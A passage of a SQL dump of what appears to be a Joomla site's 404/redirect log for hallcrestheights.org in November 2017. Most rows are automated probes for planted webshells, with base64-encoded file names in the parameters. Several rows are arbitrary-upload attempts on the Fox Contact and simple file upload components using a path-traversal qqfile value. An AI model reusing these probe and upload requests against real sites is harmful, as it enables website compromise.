20:19:52','0000-00-00 00:00:00'),(12617,'http://hallcrestheights.org/robots.txt.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:20:59','0000-00-00 00:00:00'),(12618,'http://hallcrestheights.org/sql_dump.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:21:05','0000-00-00 00:00:00'),(12619,'http://hallcrestheights.org/jconfig.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:21:09','0000-00-00 00:00:00'),(12620,'http://hallcrestheights.org/thumb.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:19:51','0000-00-00 00:00:00'),(12621,'http://hallcrestheights.org/al277.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:22:18','0000-00-00 00:00:00'),(12622,'http://hallcrestheights.org/images/al277.php?z3=a3UyRWFkLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:22:21','0000-00-00 00:00:00'),(12623,'http://hallcrestheights.org/wsdl.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:21:03','0000-00-00 00:00:00'),(12624,'http://hallcrestheights.org/wp-data.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:22:29','0000-00-00 00:00:00'),(12625,'http://hallcrestheights.org/media/1ndex.php?z3=a3UyRWFkLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:23:53','0000-00-00 00:00:00'),(12626,'http://hallcrestheights.org/media/tmp.php?z3=a3UyRWFkLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:22:35','0000-00-00 00:00:00'),(12627,'http://hallcrestheights.org/google-assist.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:24:06','0000-00-00 00:00:00'),(12628,'http://hallcrestheights.org/elements.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:23:42','0000-00-00 00:00:00'),(12629,'http://hallcrestheights.org/cache/defau1t.php?z3=a3UyRWFkLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:25:06','0000-00-00 00:00:00'),(12630,'http://hallcrestheights.org/roubt.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:25:09','0000-00-00 00:00:00'),(12631,'http://hallcrestheights.org/bookmark.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:25:13','0000-00-00 00:00:00'),(12632,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:26:05','0000-00-00 00:00:00'),(12633,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:27:04','0000-00-00 00:00:00'),(12634,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:29:31','0000-00-00 00:00:00'),(12635,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:29:59','0000-00-00 00:00:00'),(12636,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:31:44','0000-00-00 00:00:00'),(12637,'http://hallcrestheights.org/modules/modules/modules.php?z3=a3UyRWFkLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:33:44','0000-00-00 00:00:00'),(12638,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:33:46','0000-00-00 00:00:00'),(12639,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:33:49','0000-00-00 00:00:00'),(12640,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:33:04','0000-00-00 00:00:00'),(12641,'http://hallcrestheights.org/email.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:37:46','0000-00-00 00:00:00'),(12642,'http://hallcrestheights.org/images/stories/0day.php?z3=a3UyRWFkLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:36:57','0000-00-00 00:00:00'),(12643,'http://hallcrestheights.org/install.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:36:59','0000-00-00 00:00:00'),(12644,'http://hallcrestheights.org/error-log.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:40:52','0000-00-00 00:00:00'),(12645,'http://hallcrestheights.org/xmlsrpc.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:41:26','0000-00-00 00:00:00'),(12646,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:41:28','0000-00-00 00:00:00'),(12647,'http://hallcrestheights.org/shootmei.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:40:11','0000-00-00 00:00:00'),(12648,'http://hallcrestheights.org/Abbrevsprl.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:46:04','0000-00-00 00:00:00'),(12649,'http://hallcrestheights.org/shootme.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:51:59','0000-00-00 00:00:00'),(12650,'http://hallcrestheights.org/cache/support.php?z3=a3UyRWFkLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:56:07','0000-00-00 00:00:00'),(12651,'http://hallcrestheights.org/authenticating.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:57:22','0000-00-00 00:00:00'),(12652,'http://hallcrestheights.org/show.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:57:25','0000-00-00 00:00:00'),(12653,'http://hallcrestheights.org/cache/news.php?z3=a3UyRWFkLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:56:08','0000-00-00 00:00:00'),(12654,'http://hallcrestheights.org/images/head.php?z3=a3UyRWFkLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:56:11','0000-00-00 00:00:00'),(12655,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:56:16','0000-00-00 00:00:00'),(12656,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:57:40','0000-00-00 00:00:00'),(12657,'http://hallcrestheights.org/media/reads.php?z3=a3UyRWFkLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:59:05','0000-00-00 00:00:00'),(12658,'http://hallcrestheights.org/files/files.php?z3=a3UyRWFkLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:57:46','0000-00-00 00:00:00'),(12659,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=a3UyRWFkLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:59:09','0000-00-00 00:00:00'),(12660,'http://hallcrestheights.org/files/conn.php?z3=a3UyRWFkLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-11-04 20:58:35','0000-00-00 00:00:00'),(12661,'http://hallcrestheights.org/cache/list.php?z3=a3UyRWFkLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 20:59:58','0000-00-00 00:00:00'),(12662,'http://hallcrestheights.org/images/laj.php?z3=a3UyRWFkLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:02:06','0000-00-00 00:00:00'),(12663,'http://hallcrestheights.org/log.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:03:34','0000-00-00 00:00:00'),(12664,'http://hallcrestheights.org/includes/u2p.php?z3=a3UyRWFkLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:03:36','0000-00-00 00:00:00'),(12665,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=a3UyRWFkLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:03:38','0000-00-00 00:00:00'),(12666,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=a3UyRWFkLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:03:42','0000-00-00 00:00:00'),(12667,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=a3UyRWFkLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:03:45','0000-00-00 00:00:00'),(12668,'http://hallcrestheights.org/wp-main.php?z3=a3UyRWFkLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:03:53','0000-00-00 00:00:00'),(12669,'http://hallcrestheights.org/images/robots.txt.php?z3=a3UyRWFkLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:04:27','0000-00-00 00:00:00'),(12670,'http://hallcrestheights.org/cli/40dd1d.php?z3=a3UyRWFkLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-04 21:04:30','0000-00-00 00:00:00'),(12671,'http://hallcrestheights.org/media/XAttacker.php?X=Attacker',NULL,'','',8,0,'2017-11-09 04:51:44','0000-00-00 00:00:00'),(12672,'http://hallcrestheights.org/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',4,0,'2017-11-09 04:53:05','0000-00-00 00:00:00'),(12673,'http://hallcrestheights.org/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',NULL,'','',4,0,'2017-11-09 04:53:07','0000-00-00 00:00:00'),(12674,'http://hallcrestheights.org/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',8,0,'2017-11-09 04:53:08','0000-00-00 00:00:00'),(12675,'http://hallcrestheights.org/components/com_foxcontact/_func.php?X=Attacker',NULL,'','',8,0,'2017-11-09 04:53:09','0000-00-00 00:00:00'),(12676,'http://hallcrestheights.org/tmp/plupload/XAttacker.html',NULL,'','',7,0,'2017-11-09 04:53:10','0000-00-00 00:00:00'),(12677,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/XAttacker.php?X=Attacker',NULL,'','',8,0,'2017-11-09 04:53:14','0000-00-00 00:00:00'),(12678,'http://hallcrestheights.org/images/1ndex.php?z3=a3Y3TlBKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:35:24','0000-00-00 00:00:00'),(12679,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:27','0000-00-00 00:00:00'),(12680,'http://hallcrestheights.org/SessionController.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:31','0000-00-00 00:00:00'),(12681,'http://hallcrestheights.org/webconfig.txt.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:34','0000-00-00 00:00:00'),(12682,'http://hallcrestheights.org/robots.txt.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:41:26','0000-00-00 00:00:00'),(12683,'http://hallcrestheights.org/sql_dump.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:11','0000-00-00 00:00:00'),(12684,'http://hallcrestheights.org/jconfig.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:13','0000-00-00 00:00:00'),(12685,'http://hallcrestheights.org/thumb.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:15','0000-00-00 00:00:00'),(12686,'http://hallcrestheights.org/xmlrpc-activate.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-09 17:41:58','0000-00-00 00:00:00'),(12687,'http://hallcrestheights.org/al277.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:40:38','0000-00-00 00:00:00'),(12688,'http://hallcrestheights.org/images/al277.php?z3=a3Y3TlBKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:42:01','0000-00-00 00:00:00'),(12689,'http://hallcrestheights.org/wsdl.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:42:02','0000-00-00 00:00:00'),(12690,'http://hallcrestheights.org/wp-data.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:42:04','0000-00-00 00:00:00'),(12691,'http://hallcrestheights.org/media/1ndex.php?z3=a3Y3TlBKLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:42:48','0000-00-00 00:00:00'),(12692,'http://hallcrestheights.org/media/tmp.php?z3=a3Y3TlBKLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:42:49','0000-00-00 00:00:00'),(12693,'http://hallcrestheights.org/google-assist.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:42:55','0000-00-00 00:00:00'),(12694,'http://hallcrestheights.org/cache/defau1t.php?z3=a3Y3TlBKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:43:01','0000-00-00 00:00:00'),(12695,'http://hallcrestheights.org/roubt.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:44:23','0000-00-00 00:00:00'),(12696,'http://hallcrestheights.org/bookmark.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:44:26','0000-00-00 00:00:00'),(12697,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:47:19','0000-00-00 00:00:00'),(12698,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:48:45','0000-00-00 00:00:00'),(12699,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:50:44','0000-00-00 00:00:00'),(12700,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:50:47','0000-00-00 00:00:00'),(12701,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:50:50','0000-00-00 00:00:00'),(12702,'http://hallcrestheights.org/sqlbak.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-09 17:50:53','0000-00-00 00:00:00'),(12703,'http://hallcrestheights.org/install.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:52:34','0000-00-00 00:00:00'),(12704,'http://hallcrestheights.org/xmlsrpc.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:54:01','0000-00-00 00:00:00'),(12705,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:54:03','0000-00-00 00:00:00'),(12706,'http://hallcrestheights.org/shootmei.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:54:05','0000-00-00 00:00:00'),(12707,'http://hallcrestheights.org/infos.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-09 17:55:01','0000-00-00 00:00:00'),(12708,'http://hallcrestheights.org/Abbrevsprl.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 17:56:28','0000-00-00 00:00:00'),(12709,'http://hallcrestheights.org/authenticating.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:01:19','0000-00-00 00:00:00'),(12710,'http://hallcrestheights.org/show.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:02:42','0000-00-00 00:00:00'),(12711,'http://hallcrestheights.org/cache/news.php?z3=a3Y3TlBKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:02:43','0000-00-00 00:00:00'),(12712,'http://hallcrestheights.org/images/head.php?z3=a3Y3TlBKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:02:45','0000-00-00 00:00:00'),(12713,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:02:47','0000-00-00 00:00:00'),(12714,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:02:50','0000-00-00 00:00:00'),(12715,'http://hallcrestheights.org/files/files.php?z3=a3Y3TlBKLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:03:34','0000-00-00 00:00:00'),(12716,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=a3Y3TlBKLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:03:36','0000-00-00 00:00:00'),(12717,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/kv7NPJ.php',NULL,'','',1,0,'2017-11-09 18:04:25','0000-00-00 00:00:00'),(12718,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/kv7NPJ.php',NULL,'','',1,0,'2017-11-09 18:04:27','0000-00-00 00:00:00'),(12719,'http://hallcrestheights.org/wp-content/uploads/kv7NPJ.php',NULL,'','',1,0,'2017-11-09 18:04:30','0000-00-00 00:00:00'),(12720,'http://hallcrestheights.org/kv7NPJ.php',NULL,'','',1,0,'2017-11-09 18:04:32','0000-00-00 00:00:00'),(12721,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/kv7NPJ.php',NULL,'','',1,0,'2017-11-09 18:04:33','0000-00-00 00:00:00'),(12722,'http://hallcrestheights.org/libraries/joomla/1ndex.php?z3=a3Y3TlBKLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-11-09 18:05:16','0000-00-00 00:00:00'),(12723,'http://hallcrestheights.org/log.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:07:45','0000-00-00 00:00:00'),(12724,'http://hallcrestheights.org/includes/u2p.php?z3=a3Y3TlBKLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:07:47','0000-00-00 00:00:00'),(12725,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=a3Y3TlBKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:06:28','0000-00-00 00:00:00'),(12726,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=a3Y3TlBKLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:07:52','0000-00-00 00:00:00'),(12727,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=a3Y3TlBKLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:06:33','0000-00-00 00:00:00'),(12728,'http://hallcrestheights.org/wp-main.php?z3=a3Y3TlBKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:06:37','0000-00-00 00:00:00'),(12729,'http://hallcrestheights.org/images/robots.txt.php?z3=a3Y3TlBKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:07:59','0000-00-00 00:00:00'),(12730,'http://hallcrestheights.org/cli/40dd1d.php?z3=a3Y3TlBKLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-11-09 18:08:01','0000-00-00 00:00:00'),(12731,'http://www.hallcrestheights.org/i20162628-pcscqruf-unpkw-k19040-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-11-10 01:18:55','0000-00-00 00:00:00'),(12732,'http://www.hallcrestheights.org/hh-march2005.pdf',NULL,'','',1,0,'2017-11-10 05:53:10','0000-00-00 00:00:00'),(12733,'http://hallcrestheights.org/images/1ndex.php?z3=QUdDN3ZoLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:08:37','0000-00-00 00:00:00'),(12734,'http://hallcrestheights.org/cache/cachee.php?z3=QUdDN3ZoLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:09:32','0000-00-00 00:00:00'),(12735,'http://hallcrestheights.org/maill.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:09:37','0000-00-00 00:00:00'),(12736,'http://hallcrestheights.org/wp-cache.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:11:06','0000-00-00 00:00:00'),(12737,'http://hallcrestheights.org/robot.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-11-10 15:11:34','0000-00-00 00:00:00'),(12738,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=QUdDN3ZoLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:11:58','0000-00-00 00:00:00'),(12739,'http://hallcrestheights.org/SessionController.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:10:43','0000-00-00 00:00:00'),(12740,'http://hallcrestheights.org/webconfig.txt.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:12:19','0000-00-00 00:00:00'),(12741,'http://hallcrestheights.org/robots.txt.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:13:18','0000-00-00 00:00:00'),(12742,'http://hallcrestheights.org/sql_dump.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:13:27','0000-00-00 00:00:00'),(12743,'http://hallcrestheights.org/jconfig.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:13:36','0000-00-00 00:00:00'),(12744,'http://hallcrestheights.org/thumb.php?z3=QUdDN3ZoLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 15:13:40','0000-00-00 00:00:00'),(12745,'http://hallcrestheights.org/images/1ndex.php?z3=bm9OSVhnLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:04:36','0000-00-00 00:00:00'),(12746,'http://hallcrestheights.org/cache/cachee.php?z3=bm9OSVhnLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:07:06','0000-00-00 00:00:00'),(12747,'http://hallcrestheights.org/maill.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:08:34','0000-00-00 00:00:00'),(12748,'http://hallcrestheights.org/wp-cache.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:10:00','0000-00-00 00:00:00'),(12749,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=bm9OSVhnLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:09:59','0000-00-00 00:00:00'),(12750,'http://hallcrestheights.org/SessionController.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:11:26','0000-00-00 00:00:00'),(12751,'http://hallcrestheights.org/webconfig.txt.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:10:12','0000-00-00 00:00:00'),(12752,'http://hallcrestheights.org/robots.txt.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:13:46','0000-00-00 00:00:00'),(12753,'http://hallcrestheights.org/sql_dump.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:15:34','0000-00-00 00:00:00'),(12754,'http://hallcrestheights.org/jconfig.php?z3=bm9OSVhnLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-11-10 18:15:44','0000-00-00 